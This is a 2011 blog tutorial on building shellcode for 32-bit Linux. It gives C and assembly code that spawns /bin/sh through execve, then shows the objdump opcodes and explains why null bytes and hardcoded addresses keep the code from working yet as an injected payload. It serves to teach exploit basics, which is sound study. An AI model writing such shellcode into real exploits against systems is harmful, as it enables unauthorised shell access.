Thursday, March 10, 2011

Shellcode Basics

    Here we make use of gcc 4.4.1, gdb, and objdump tools to construct a shell code and we embed this code in a c program and run this exploit on vulnerable Linux machine.
    The following is the basic c code to spawn a shell using the execve system call( the general syntax of execve system call is: int execve(const char *filename,char *const argv[],char *const envp[]), this returns 0 on success and -1 on  failure).

//shell.c
void main()
{
   char *name[2];

   name[0] = "/bin/sh";
   name[1] = NULL;
   execve(name[0], name, NULL);
}

This is compiled as gcc -o shell -ggdb -static shell.c
    Here we have to include -static or else the actual code for the execve will not be included, instead there will be a reference to dynamic C library that would normally would be linked in at load time.
    Then we can look at its assembler code by disassembling the main program using gdb (step 1. gdb ./shell step 2. disas main), so that we can get basic idea of how the assembly code is written.
    So now we have to write a assembly code and check out its shell code using objdump, i am not going to teach you of how to write assembly code from basics. :)

#shellcode.s
#check c code thoroughly before seeing this assembly code
.data
    sh:
       .asciz "/bin/sh"
    NULL1:
       .int 0
    shaddr:
       .int 0
    NULL2:
       .int 0 
.text
    .globl _start
_start:
    movl $sh,shaddr  #moving address of sh to shaddr 
    movl $11,%eax #11 is system call number for execve
    movl $sh, %ebx #1st argument
    movl $shaddr, %ecx # 2nd argument
    movl $NULL2, %edx # 3rd argument
    int $0x80
           
Here in the above assembly code i am using at&t syntax. The .data part specifies the variables that we are going to use in the program, the _start: part indicates the starting of the code.In general we move system call number into %eax followed by arguments for the system call into %ebx, %ecx and so on. The data part in memory is organized as "/bin/sh" followed by null1 and followed by address of sh and again followed by null2.
  Comparing this with above c code we have sh==>name[0], null1==>name[1], shaddr==>name, null2==>NULL(environment pointer), and at last int $0x80 is used to wake up kernel to run.
   On execution of above assembly code is as follows:

manoj@manoj-laptop:~/Desktop/buffer$ as -gstabs -o shell.o shell.s
manoj@manoj-laptop:~/Desktop/buffer$ ld -o shell shell.o
manoj@manoj-laptop:~/Desktop/buffer$ ./shell
$

  Now we use the objdump tool to check the shell code for our assembly code

manoj@manoj-laptop:~/Desktop/buffer$ objdump -d ./shell

./shell:     file format elf32-i386


Disassembly of section .text:

08048074 <_start>:
 8048074:    c7 05 a0 90 04 08 94     movl   $0x8049094,0x80490a0
 804807b:    90 04 08
 804807e:    b8 0b 00 00 00           mov    $0xb,%eax
 8048083:    bb 94 90 04 08           mov    $0x8049094,%ebx
 8048088:    b9 a0 90 04 08           mov    $0x80490a0,%ecx
 804808d:    ba a4 90 04 08           mov    $0x80490a4,%edx
 8048092:    cd 80                    int    $0x80


   The second column (i.e c7, 05,....) indicates the shell code. But the following are the problems associated with the above shell code:
1. There are zeroes(i.e 00) in the above shell code, as we know we cannot push this into a character array(to implement exploit), simply because in strings null means end of string, so if we push this into a string and give this as input to a program then program wont consider the string part present after 00. hence we have to further modify the assembly code to remove these null characters
2. You can observe that the addresses of say "/bin/sh" location ($0x8049094) are all hard coded as we can see above, so the problem with this is it may not work if we try to push this across various computers, so we need to setup relative addressing, to make our shell code much flexible.
   In my next post i will be giving information of how we can get shell code which is flexible enough and without having problems as mentioned above.

0 comments: